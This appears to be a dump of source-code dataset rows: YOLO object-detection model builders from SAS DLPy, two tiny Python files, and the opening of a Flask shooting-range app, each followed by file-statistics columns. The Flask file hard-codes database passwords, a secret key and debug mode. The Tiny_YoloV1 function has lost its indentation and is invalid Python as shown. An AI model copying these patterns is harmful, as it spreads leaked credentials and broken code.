    pointLayer1 = BN(act=act, name='BN5_13')
    model.add(pointLayer1)
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv14 7 13
    model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv15 7 13
    model.add(Conv2d(512, width=1, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv16 7 13
    model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv17 7 13
    model.add(Conv2d(512, width=1, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv18 7 13
    model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv19 7 13
    model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act, name='BN6_19'))
    # conv20 7 13
    model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
    pointLayer2 = BN(act=act, name='BN6_20')
    model.add(pointLayer2)
    # Passthrough branch: conv21 7 26 * 26 * 512 -> 26 * 26 * 64
    model.add(Conv2d(64, width=1, act='identity', include_bias=False, stride=1, src_layers=[pointLayer1]))
    model.add(BN(act=act))
    # reshape 26 * 26 * 64 -> 13 * 13 * 256 so it can be concatenated with the low-res path
    pointLayer3 = Reshape(act='identity', width=grid_number, height=grid_number, depth=256, name='reshape1')
    model.add(pointLayer3)
    # concat the passthrough features with the main branch
    model.add(Concat(act='identity', src_layers=[pointLayer2, pointLayer3]))
    # conv22 7 13
    model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))

    # Prediction head: one 1x1 conv producing (classes + 5 box terms) per anchor.
    model.add(
        Conv2d((n_classes + 5) * predictions_per_grid, width=1, act='identity', include_bias=False, stride=1))
    model.add(Detection(act=act_detection, detection_model_type='yolov2', anchors=anchors,
                        softmax_for_class_prob=softmax_for_class_prob, coord_type=coord_type,
                        class_number=n_classes, grid_number=grid_number,
                        predictions_per_grid=predictions_per_grid, do_sqrt=do_sqrt, coord_scale=coord_scale,
                        object_scale=object_scale, prediction_not_a_object_scale=prediction_not_a_object_scale,
                        class_scale=class_scale, detection_threshold=detection_threshold,
                        iou_threshold=iou_threshold, random_boxes=random_boxes,
                        max_label_per_image=max_label_per_image, max_boxes=max_boxes,
                        match_anchor_size=match_anchor_size, num_to_force_coord=num_to_force_coord))

    return model
def Tiny_YoloV2(conn, anchors, model_table='Tiny-Yolov2', n_channels=3, width=416, height=416, scale=1.0 / 255,
                random_mutation=None, act='leaky', act_detection='AUTO', softmax_for_class_prob=True,
                coord_type='YOLO', max_label_per_image=30, max_boxes=30,
                n_classes=20, predictions_per_grid=5, do_sqrt=True, grid_number=13,
                coord_scale=None, object_scale=None, prediction_not_a_object_scale=None, class_scale=None,
                detection_threshold=None, iou_threshold=None, random_boxes=False, match_anchor_size=None,
                num_to_force_coord=None, random_flip=None, random_crop=None):
    '''
    Generate a deep learning model with the Tiny Yolov2 architecture.

    Tiny Yolov2 is a very small model of Yolov2, so that it includes fewer
    numbers of convolutional layer and batch normalization layer.

    Parameters
    ----------
    conn : CAS
        Specifies the connection of the CAS connection.
    anchors : list
        Specifies the anchor box values.
    model_table : string, optional
        Specifies the name of CAS table to store the model.
    n_channels : int, optional
        Specifies the number of the channels (i.e., depth) of the input layer.
        Default: 3
    width : int, optional
        Specifies the width of the input layer.
        Default: 416
    height : int, optional
        Specifies the height of the input layer.
        Default: 416
    scale : double, optional
        Specifies a scaling factor to be applied to each pixel intensity values.
        Default: 1.0 / 255
    random_mutation : string, optional
        Specifies how to apply data augmentations/mutations to the data in the
        input layer.
        Valid Values: 'none', 'random'
    act : string, optional
        Specifies the activation function for the batch normalization layers.
        Default: 'leaky'
    act_detection : string, optional
        Specifies the activation function for the detection layer.
        Valid Values: AUTO, IDENTITY, LOGISTIC, SIGMOID, TANH, RECTIFIER, RELU, SOFTPLUS, ELU, LEAKY, FCMP
        Default: AUTO
    softmax_for_class_prob : bool, optional
        Specifies whether to perform Softmax on class probability per
        predicted object.
        Default: True
    coord_type : string, optional
        Specifies the format of how to represent bounding boxes. For example,
        a bounding box can be represented with the x and y locations of the
        top-left point as well as width and height of the rectangle.
        This format is the 'rect' format. We also support coco and yolo formats.
        Valid Values: 'rect', 'yolo', 'coco'
        Default: 'yolo'
    max_label_per_image : int, optional
        Specifies the maximum number of labels per image in the training.
        Default: 30
    max_boxes : int, optional
        Specifies the maximum number of overall predictions allowed in the
        detection layer.
        Default: 30
    n_classes : int, optional
        Specifies the number of classes. If None is assigned, the model will
        automatically detect the number of classes based on the training set.
        Default: 20
    predictions_per_grid : int, optional
        Specifies the number of predictions to be made per grid cell.
        Default: 5
    do_sqrt : bool, optional
        Specifies whether to apply the SQRT function to width and height of
        the object for the cost function.
        Default: True
    grid_number : int, optional
        Specifies the amount of cells to be analyzed for an image. For example,
        if the value is 5, then the image will be divided into a 5 x 5 grid.
        Default: 13
    coord_scale : float, optional
        Specifies the weight for the cost function in the detection layer,
        when objects exist in the grid.
    object_scale : float, optional
        Specifies the weight for object detected for the cost function in
        the detection layer.
    prediction_not_a_object_scale : float, optional
        Specifies the weight for the cost function in the detection layer,
        when objects do not exist in the grid.
    class_scale : float, optional
        Specifies the weight for the class of object detected for the cost
        function in the detection layer.
    detection_threshold : float, optional
        Specifies the threshold for object detection.
    iou_threshold : float, optional
        Specifies the IOU Threshold of maximum suppression in object detection.
    random_boxes : bool, optional
        Randomizing boxes when loading the bounding box information.
        Default: False
    match_anchor_size : bool, optional
        Whether to force the predicted box match the anchor boxes in sizes for all predictions
    num_to_force_coord : int, optional
        The number of leading chunk of images in training when the algorithm forces predicted objects
        in each grid to be equal to the anchor box sizes, and located at the grid center
    random_flip : string, optional
        Specifies how to flip the data in the input layer when image data is
        used. Approximately half of the input data is subject to flipping.
        Valid Values: 'h', 'hv', 'v', 'none'
    random_crop : string, optional
        Specifies how to crop the data in the input layer when image data is
        used. Images are cropped to the values that are specified in the width
        and height parameters. Only the images with one or both dimensions
        that are larger than those sizes are cropped.
        Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'

    Returns
    -------
    :class:`Sequential`

    References
    ----------
    https://arxiv.org/pdf/1612.08242.pdf

    '''
    # Each predicted box needs an (width, height) anchor pair; validate up front
    # for a clear error (same check as YoloV2) instead of a backend failure.
    if len(anchors) != 2 * predictions_per_grid:
        raise DLPyError('The size of the anchor list in the detection layer for YOLOv2 should be equal to '
                        'twice the number of predictions_per_grid.')

    model = Sequential(conn=conn, model_table=model_table)

    # NOTE: locals() is captured here so get_layer_options can pick out the
    # input-layer keyword arguments; do not define helper variables above this line.
    parameters = locals()
    input_parameters = get_layer_options(input_layer_options, parameters)
    # Only square inputs are supported; fall back to width x width when they differ.
    if input_parameters['width'] != input_parameters['height']:
        print(not_supported_feature('Non-square yolo model training', 'height=width'))
        input_parameters['height'] = input_parameters['width']
    model.add(InputLayer(**input_parameters))

    # Tiny backbone: alternating Conv (no bias) + BN(act) with max pooling.
    # conv1 416 448
    model.add(Conv2d(n_filters=16, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv2 208 224
    model.add(Conv2d(n_filters=32, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv3 104 112
    model.add(Conv2d(n_filters=64, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv4 52 56
    model.add(Conv2d(n_filters=128, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv5 26 28
    model.add(Conv2d(n_filters=256, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv6 13 14
    model.add(Conv2d(n_filters=512, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # stride 1 pooling keeps the 13 x 13 grid resolution
    model.add(Pooling(width=2, height=2, stride=1, pool='max'))
    # conv7 13
    model.add(Conv2d(n_filters=1024, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv8 13
    model.add(Conv2d(n_filters=512, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))

    # Prediction head: one 1x1 conv producing (classes + 5 box terms) per anchor.
    model.add(Conv2d((n_classes + 5) * predictions_per_grid, width=1, act='identity', include_bias=False, stride=1))
    model.add(Detection(act=act_detection, detection_model_type='yolov2', anchors=anchors,
                        softmax_for_class_prob=softmax_for_class_prob, coord_type=coord_type,
                        class_number=n_classes, grid_number=grid_number,
                        predictions_per_grid=predictions_per_grid, do_sqrt=do_sqrt, coord_scale=coord_scale,
                        object_scale=object_scale, prediction_not_a_object_scale=prediction_not_a_object_scale,
                        class_scale=class_scale, detection_threshold=detection_threshold,
                        iou_threshold=iou_threshold, random_boxes=random_boxes,
                        max_label_per_image=max_label_per_image, max_boxes=max_boxes,
                        match_anchor_size=match_anchor_size, num_to_force_coord=num_to_force_coord))

    return model
def YoloV1(conn, model_table='YoloV1', n_channels=3, width=448, height=448, scale=1.0 / 255,
           random_mutation=None, act='leaky', dropout=0, act_detection='AUTO', softmax_for_class_prob=True,
           coord_type='YOLO', max_label_per_image=30, max_boxes=30,
           n_classes=20, predictions_per_grid=2, do_sqrt=True, grid_number=7,
           coord_scale=None, object_scale=None, prediction_not_a_object_scale=None, class_scale=None,
           detection_threshold=None, iou_threshold=None, random_boxes=False, random_flip=None, random_crop=None):
    '''
    Generates a deep learning model with the Yolo V1 architecture.

    Parameters
    ----------
    conn : CAS
        Specifies the connection of the CAS connection.
    model_table : string, optional
        Specifies the name of CAS table to store the model.
    n_channels : int, optional
        Specifies the number of the channels (i.e., depth) of the input layer.
        Default: 3
    width : int, optional
        Specifies the width of the input layer.
        Default: 448
    height : int, optional
        Specifies the height of the input layer.
        Default: 448
    scale : double, optional
        Specifies a scaling factor to be applied to each pixel intensity values.
        Default: 1.0 / 255
    random_mutation : string, optional
        Specifies how to apply data augmentations/mutations to the data in
        the input layer.
        Valid Values: 'none', 'random'
    act: String, optional
        Specifies the activation function to be used in the convolutional layer
        layers and the final convolution layer.
        Default: 'leaky'
    dropout: double, optional
        Specifies the drop out rate.
        Default: 0
    act_detection : string, optional
        Specifies the activation function for the detection layer.
        Valid Values: AUTO, IDENTITY, LOGISTIC, SIGMOID, TANH, RECTIFIER, RELU, SOFTPLUS, ELU, LEAKY, FCMP
        Default: AUTO
    softmax_for_class_prob : bool, optional
        Specifies whether to perform Softmax on class probability per
        predicted object.
        Default: True
    coord_type : string, optional
        Specifies the format of how to represent bounding boxes. For example,
        a bounding box can be represented with the x and y locations of the
        top-left point as well as width and height of the rectangle.
        This format is the 'rect' format. We also support coco and yolo formats.
        Valid Values: 'rect', 'yolo', 'coco'
        Default: 'yolo'
    max_label_per_image : int, optional
        Specifies the maximum number of labels per image in the training.
        Default: 30
    max_boxes : int, optional
        Specifies the maximum number of overall predictions allowed in the
        detection layer.
        Default: 30
    n_classes : int, optional
        Specifies the number of classes. If None is assigned, the model will
        automatically detect the number of classes based on the training set.
        Default: 20
    predictions_per_grid : int, optional
        Specifies the amount of predictions will be done per grid.
        Default: 2
    do_sqrt : bool, optional
        Specifies whether to apply the SQRT function to width and height of
        the object for the cost function.
        Default: True
    grid_number : int, optional
        Specifies the amount of cells to be analyzed for an image. For example,
        if the value is 5, then the image will be divided into a 5 x 5 grid.
        Default: 7
    coord_scale : float, optional
        Specifies the weight for the cost function in the detection layer,
        when objects exist in the grid.
    object_scale : float, optional
        Specifies the weight for object detected for the cost function in
        the detection layer.
    prediction_not_a_object_scale : float, optional
        Specifies the weight for the cost function in the detection layer,
        when objects do not exist in the grid.
    class_scale : float, optional
        Specifies the weight for the class of object detected for the cost
        function in the detection layer.
    detection_threshold : float, optional
        Specifies the threshold for object detection.
    iou_threshold : float, optional
        Specifies the IOU Threshold of maximum suppression in object detection.
    random_boxes : bool, optional
        Randomizing boxes when loading the bounding box information.
        Default: False
    random_flip : string, optional
        Specifies how to flip the data in the input layer when image data is
        used. Approximately half of the input data is subject to flipping.
        Valid Values: 'h', 'hv', 'v', 'none'
    random_crop : string, optional
        Specifies how to crop the data in the input layer when image data is
        used. Images are cropped to the values that are specified in the width
        and height parameters. Only the images with one or both dimensions
        that are larger than those sizes are cropped.
        Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'

    Returns
    -------
    :class:`Sequential`

    References
    ----------
    https://arxiv.org/pdf/1506.02640.pdf

    '''
    model = Sequential(conn=conn, model_table=model_table)

    # NOTE: locals() is captured here so get_layer_options can pick out the
    # input-layer keyword arguments; defining extra locals above this call
    # would change the contents of `parameters`.
    parameters = locals()
    input_parameters = get_layer_options(input_layer_options, parameters)
    # Only square inputs are supported; fall back to width x width when they differ.
    if input_parameters['width'] != input_parameters['height']:
        print(not_supported_feature('Non-square yolo model training', 'height=width'))
        input_parameters['height'] = input_parameters['width']
    model.add(InputLayer(**input_parameters))

    # Backbone: unlike the YoloV2 builders, activations are applied directly on
    # the convolution layers (no batch normalization layers in this model).
    # conv1 448
    model.add(Conv2d(32, width=3, act=act, include_bias=False, stride=1))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv2 224
    model.add(Conv2d(64, width=3, act=act, include_bias=False, stride=1))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv3 112
    model.add(Conv2d(128, width=3, act=act, include_bias=False, stride=1))
    # conv4 112
    model.add(Conv2d(64, width=1, act=act, include_bias=False, stride=1))
    # conv5 112
    model.add(Conv2d(128, width=3, act=act, include_bias=False, stride=1))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv6 56
    model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1))
    # conv7 56
    model.add(Conv2d(128, width=1, act=act, include_bias=False, stride=1))
    # conv8 56
    model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv9 28
    model.add(Conv2d(512, width=3, act=act, include_bias=False, stride=1))
    # conv10 28
    model.add(Conv2d(256, width=1, act=act, include_bias=False, stride=1))
    # conv11 28
    model.add(Conv2d(512, width=3, act=act, include_bias=False, stride=1))
    # conv12 28
    model.add(Conv2d(256, width=1, act=act, include_bias=False, stride=1))
    # conv13 28
    model.add(Conv2d(512, width=3, act=act, include_bias=False, stride=1))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv14 14
    model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
    # conv15 14
    model.add(Conv2d(512, width=1, act=act, include_bias=False, stride=1))
    # conv16 14
    model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
    # conv17 14
    model.add(Conv2d(512, width=1, act=act, include_bias=False, stride=1))
    # conv18 14
    model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
    # conv19 14
    model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
    # conv20 7 (stride 2 halves the spatial resolution to the 7 x 7 grid)
    model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=2))
    # conv21 7
    model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
    # conv22 7
    model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
    # conv23 7
    model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1, dropout=dropout))

    # YOLOv1 prediction head: a fully connected layer of size
    # (C + 5 * B) * S * S, i.e. class scores plus 5 box terms per prediction
    # for each cell of the S x S grid.
    model.add(Dense(n=(n_classes + (5 * predictions_per_grid)) * grid_number * grid_number, act='identity'))
    model.add(Detection(act = act_detection, detection_model_type = 'yolov1',
                        softmax_for_class_prob = softmax_for_class_prob, coord_type = coord_type,
                        class_number = n_classes, grid_number = grid_number,
                        predictions_per_grid = predictions_per_grid, do_sqrt = do_sqrt, coord_scale = coord_scale,
                        object_scale = object_scale, prediction_not_a_object_scale = prediction_not_a_object_scale,
                        class_scale = class_scale, detection_threshold = detection_threshold,
                        iou_threshold = iou_threshold, random_boxes = random_boxes,
                        max_label_per_image = max_label_per_image, max_boxes = max_boxes))

    return model
def Tiny_YoloV1(conn, model_table='Tiny-YoloV1', n_channels=3, width=448, height=448, scale=1.0 / 255,
random_mutation=None, act='leaky', dropout=0, act_detection='AUTO', softmax_for_class_prob=True,
coord_type='YOLO', max_label_per_image=30, max_boxes=30,
n_classes=20, predictions_per_grid=2, do_sqrt=True, grid_number=7,
coord_scale=None, object_scale=None, prediction_not_a_object_scale=None, class_scale=None,
detection_threshold=None, iou_threshold=None, random_boxes=False, random_flip=None, random_crop=None):
'''
Generates a deep learning model with the Tiny Yolov1 architecture.
Tiny Yolov1 is a very small model of Yolov1, so that it includes
fewer numbers of convolutional layer.
Parameters
----------
conn : CAS
Specifies the connection of the CAS connection.
model_table : string, optional
Specifies the name of CAS table to store the model.
n_channels : int, optional
Specifies the number of the channels (i.e., depth) of the input layer.
Default: 3
width : int, optional
Specifies the width of the input layer.
Default: 448
height : int, optional
Specifies the height of the input layer.
Default: 448
scale : double, optional
Specifies a scaling factor to be applied to each pixel intensity values.
Default: 1.0 / 255
random_mutation : string, optional
Specifies how to apply data augmentations/mutations to the data in
the input layer.
Valid Values: 'none', 'random'
act: String, optional
Specifies the activation function to be used in the convolutional layer
layers and the final convolution layer.
Default: 'leaky'
dropout: double, optional
Specifies the drop out rate.
Default: 0
act_detection : string, optional
Specifies the activation function for the detection layer.
Valid Values: AUTO, IDENTITY, LOGISTIC, SIGMOID, TANH, RECTIFIER, RELU, SOFTPLUS, ELU, LEAKY, FCMP
Default: AUTO
softmax_for_class_prob : bool, optional
Specifies whether to perform Softmax on class probability per
predicted object.
Default: True
coord_type : string, optional
Specifies the format of how to represent bounding boxes. For example,
a bounding box can be represented with the x and y locations of the
top-left point as well as width and height of the rectangle.
This format is the 'rect' format. We also support coco and yolo formats.
Valid Values: 'rect', 'yolo', 'coco'
Default: 'yolo'
max_label_per_image : int, optional
Specifies the maximum number of labels per image in the training.
Default: 30
max_boxes : int, optional
Specifies the maximum number of overall predictions allowed in the
detection layer.
Default: 30
n_classes : int, optional
Specifies the number of classes. If None is assigned, the model will
automatically detect the number of classes based on the training set.
Default: 20
predictions_per_grid : int, optional
Specifies the amount of predictions will be done per grid.
Default: 2
do_sqrt : bool, optional
Specifies whether to apply the SQRT function to width and height of
the object for the cost function.
Default: True
grid_number : int, optional
Specifies the amount of cells to be analyzed for an image. For example,
if the value is 5, then the image will be divided into a 5 x 5 grid.
Default: 7
coord_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects exist in the grid.
object_scale : float, optional
Specifies the weight for object detected for the cost function in
the detection layer.
prediction_not_a_object_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects do not exist in the grid.
class_scale : float, optional
Specifies the weight for the class of object detected for the cost
function in the detection layer.
detection_threshold : float, optional
Specifies the threshold for object detection.
iou_threshold : float, optional
Specifies the IOU Threshold of maximum suppression in object detection.
random_boxes : bool, optional
Randomizing boxes when loading the bounding box information.
Default: False
random_flip : string, optional
Specifies how to flip the data in the input layer when image data is
used. Approximately half of the input data is subject to flipping.
Valid Values: 'h', 'hv', 'v', 'none'
random_crop : string, optional
Specifies how to crop the data in the input layer when image data is
used. Images are cropped to the values that are specified in the width
and height parameters. Only the images with one or both dimensions
that are larger than those sizes are cropped.
Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'
Returns
-------
:class:`Sequential`
References
----------
https://arxiv.org/pdf/1506.02640.pdf
'''
model = Sequential(conn=conn, model_table=model_table)
parameters = locals()
input_parameters = get_layer_options(input_layer_options, parameters)
if input_parameters['width'] != input_parameters['height']:
print(not_supported_feature('Non-square yolo model training', 'height=width'))
input_parameters['height'] = input_parameters['width']
model.add(InputLayer(**input_parameters))
model.add(Conv2d(16, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(32, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(64, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(128, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(512, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1, dropout=dropout))
model.add(Dense(n=(n_classes + (5 * predictions_per_grid)) * grid_number * grid_number, act='identity'))
model.add(Detection(act=act_detection, detection_model_type='yolov1',
softmax_for_class_prob=softmax_for_class_prob, coord_type=coord_type,
class_number=n_classes, grid_number=grid_number,
predictions_per_grid=predictions_per_grid, do_sqrt=do_sqrt, coord_scale=coord_scale,
object_scale=object_scale, prediction_not_a_object_scale=prediction_not_a_object_scale,
class_scale=class_scale, detection_threshold=detection_threshold,
iou_threshold=iou_threshold, random_boxes=random_boxes,
max_label_per_image=max_label_per_image, max_boxes=max_boxes))
return model
| 46.920921
| 121
| 0.681295
| 6,615
| 46,874
| 4.707483
| 0.05805
| 0.044188
| 0.059088
| 0.057932
| 0.947913
| 0.940559
| 0.937476
| 0.935356
| 0.935356
| 0.930186
| 0
| 0.035353
| 0.23241
| 46,874
| 998
| 122
| 46.967936
| 0.830128
| 0.511478
| 0
| 0.886207
| 0
| 0
| 0.055055
| 0.001017
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017241
| false
| 0
| 0.013793
| 0
| 0.048276
| 0.017241
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b174bff58ca82ba08724a863f39109fcdce0e48c
| 33
|
py
|
Python
|
python/ql/test/library-tests/dependencies/a.py
|
vadi2/codeql
|
a806a4f08696d241ab295a286999251b56a6860c
|
[
"MIT"
] | 4,036
|
2020-04-29T00:09:57.000Z
|
2022-03-31T14:16:38.000Z
|
python/ql/test/library-tests/dependencies/a.py
|
vadi2/codeql
|
a806a4f08696d241ab295a286999251b56a6860c
|
[
"MIT"
] | 2,970
|
2020-04-28T17:24:18.000Z
|
2022-03-31T22:40:46.000Z
|
python/ql/test/library-tests/dependencies/a.py
|
ScriptBox99/github-codeql
|
2ecf0d3264db8fb4904b2056964da469372a235c
|
[
"MIT"
] | 794
|
2020-04-29T00:28:25.000Z
|
2022-03-30T08:21:46.000Z
|
import b
class A(b.B):
    """Empty subclass of ``b.B``; adds no attributes or behavior of its own."""
    pass
| 6.6
| 13
| 0.575758
| 7
| 33
| 2.714286
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.30303
| 33
| 4
| 14
| 8.25
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
493d58539b5075dfaadb4b4efadb207c3969b673
| 41
|
py
|
Python
|
external/models/TransE_USE_h2/__init__.py
|
swapUniba/Elliot_refactor-tesi-Ventrella
|
3ddffc041696c90a6f6d3e8906c212fc4f55f842
|
[
"Apache-2.0"
] | null | null | null |
external/models/TransE_USE_h2/__init__.py
|
swapUniba/Elliot_refactor-tesi-Ventrella
|
3ddffc041696c90a6f6d3e8906c212fc4f55f842
|
[
"Apache-2.0"
] | null | null | null |
external/models/TransE_USE_h2/__init__.py
|
swapUniba/Elliot_refactor-tesi-Ventrella
|
3ddffc041696c90a6f6d3e8906c212fc4f55f842
|
[
"Apache-2.0"
] | null | null | null |
from .TransE_USE_h2 import TransE_USE_h2
| 20.5
| 40
| 0.878049
| 8
| 41
| 4
| 0.625
| 0.5625
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 0.097561
| 41
| 1
| 41
| 41
| 0.810811
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
49402908cc47d4a4f0ba191524384e5425efd183
| 442,812
|
py
|
Python
|
view.py
|
wasifa-airtel/FRAS_20171115
|
ac3891b361ae088aec7d616a3d9761b453fabba5
|
[
"MIT"
] | null | null | null |
view.py
|
wasifa-airtel/FRAS_20171115
|
ac3891b361ae088aec7d616a3d9761b453fabba5
|
[
"MIT"
] | null | null | null |
view.py
|
wasifa-airtel/FRAS_20171115
|
ac3891b361ae088aec7d616a3d9761b453fabba5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 31 15:16:47 2017
@author: wasifaahmed
"""
from flask import Flask, flash,render_template, request, Response, redirect, url_for, send_from_directory,jsonify,session
import json as json
from datetime import datetime,timedelta,date
from sklearn.cluster import KMeans
import numpy as np
from PIL import Image
from flask.ext.sqlalchemy import SQLAlchemy
import matplotlib.image as mpimg
from io import StringIO
from skimage import data, exposure, img_as_float ,io,color
import scipy
from scipy import ndimage
import time
import tensorflow as tf
import os , sys
import shutil
import numpy as np
import pandas as pd
from PIL import Image
from model import *
from sqlalchemy.sql import text
from sqlalchemy import *
from forms import *
import math
from io import StringIO
import csv
from sqlalchemy.orm import load_only
from datetime import datetime,date
from numpy import genfromtxt
from sqlalchemy.ext.serializer import loads, dumps
from sqlalchemy.orm import sessionmaker, scoped_session
from flask_bootstrap import Bootstrap
# Build a dedicated TF graph and keep one global session alive for the
# lifetime of the web app; load_model() later restores weights into it.
graph = tf.Graph()
with graph.as_default():
    sess = tf.Session(graph=graph)
    init_op = tf.global_variables_initializer()
# Module-global scratch list (shot coordinates; mutated elsewhere).
pointsarray=[]
def load_model():
    """Restore the pre-trained FRAS TensorFlow model into the global session.

    Runs the variable initializer on the module-level ``sess``, imports the
    saved meta-graph, and restores the checkpoint weights. Intended to be
    called once at application startup.
    """
    sess.run(init_op)
    # NOTE(review): the checkpoint path is machine-specific; it should come
    # from configuration / an environment variable rather than being
    # hard-coded to an E: drive.
    saver = tf.train.import_meta_graph('E:/FRAS Windows/FRAS_production/Simulation/FRAS_20170726/FRAS_20170727.meta')
    print('The model is loading...')
    saver.restore(sess, 'E:/FRAS Windows/FRAS_production/Simulation/FRAS_20170726/FRAS_20170727')
    print('loaded...')
# Database / Flask application wiring.
# NOTE(review): database credentials and SECRET_KEY are hard-coded in source
# and DEBUG=True is enabled; move secrets to environment variables and
# disable debug before deployment.
engine =create_engine('postgresql://postgres:user@localhost/postgres')
Session = scoped_session(sessionmaker(bind=engine))
mysession = Session()
app = Flask(__name__)
app.config.update(
    DEBUG=True,
    SECRET_KEY='\xa9\xc2\xc6\xfa|\x82\x1a\xfa\x1b#~\xd6ppR=\x1e4\xfb`-\xc0\xad\xc9')
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:user@localhost/fras_production'
db.init_app(app)
Bootstrap(app)
@app.after_request
def add_header(response):
    """Attach IE-compatibility and cache-busting headers to every response."""
    extra_headers = {
        'X-UA-Compatible': 'IE=Edge,chrome=1',
        'Cache-Control': 'public, max-age=0',
    }
    for header_name, header_value in extra_headers.items():
        response.headers[header_name] = header_value
    return response
@app.route('/',methods=['GET', 'POST'])
def login():
    """Serve the login page with a fresh LoginForm."""
    return render_template('forms/login.html', form=LoginForm())
@app.route('/home',methods=['GET', 'POST'])
def index():
    """Serve the application home page."""
    return render_template('pages/home.html')
@app.route('/detail_setup/')
def Detail_Setup():
    """Render the manual detail-setup page.

    Lists today's (and future) shooting sessions newest-first, plus every
    registered shooter's service id for the firer picker.
    """
    today = time.strftime("%Y-%m-%d")
    sessions = (Shooting_Session.query
                .filter(Shooting_Session.date >= today)
                .order_by(Shooting_Session.datetimestamp.desc())
                .all())
    service_ids = [shooter.service_id for shooter in Shooter.query.all()]
    return render_template('pages/detail_setup.html',
                           data=sessions,
                           firer_1=service_ids)
@app.route('/auto_setup/')
def auto_setup():
    """Render the automatic detail-setup page.

    Shows today's (and future) shooting sessions newest-first and the
    distinct target groups registered for today.
    """
    # Fix: dropped the unused local `drop=[]` from the original.
    curdate = time.strftime("%Y-%m-%d")
    form = BulkRegistrationForm()
    selection_2 = (Shooting_Session.query
                   .filter(Shooting_Session.date >= curdate)
